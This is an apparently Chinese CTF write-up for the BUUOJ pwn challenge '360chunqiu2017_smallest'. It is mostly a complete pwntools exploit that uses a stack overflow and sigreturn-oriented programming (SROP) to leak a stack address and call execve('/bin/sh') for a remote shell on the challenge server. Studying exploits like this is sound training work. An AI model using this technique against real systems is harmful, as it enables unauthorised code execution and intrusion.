360chunqiu2017_smallest
保护检查
源码分析
程序非常简单,就是一个输入,有明显溢出
这题要用到srop
要用到输入的字节数设置rax的值,实现应该在栈上布置好要返回的地址
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| from pwn import *
context(os='linux',arch='amd64',log_level='debug')
#p = process("./buu")
p = remote('node4.buuoj.cn',26690)
start_addr = 0x4000B0
write_addr = 0x4000B3
syscall_ret = 0x4000BE
def debug():
gdb.attach(p)
payload = p64(start_addr) + p64(write_addr) + p64(start_addr)
p.send(payload)
pause()
payload = '\xb3'
p.send(payload)
pause()
stack = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
stack = stack & 0xfffffffffffff000
stack -= 0x2000
print(hex(stack))
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = stack
frame.rdx = 0x400
frame.rsp = stack
frame.rip = syscall_ret
payload = p64(start_addr) + p64(syscall_ret) + str(frame)
p.sendline(payload)
pause()
payload = p64(syscall_ret) + 'b' * 7
p.send(payload)
pause()
frame = SigreturnFrame()
frame.rax = 59
frame.rdi = stack + 0x200
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret
payload = p64(start_addr) + p64(syscall_ret) + str(frame)
payload += 'a'*(0x200 - len(payload)) + "/bin/sh\x00"
p.sendline(payload)
pause()
payload = p64(syscall_ret) + 'a'*7
p.send(payload)
#debug()
p.interactive()
|
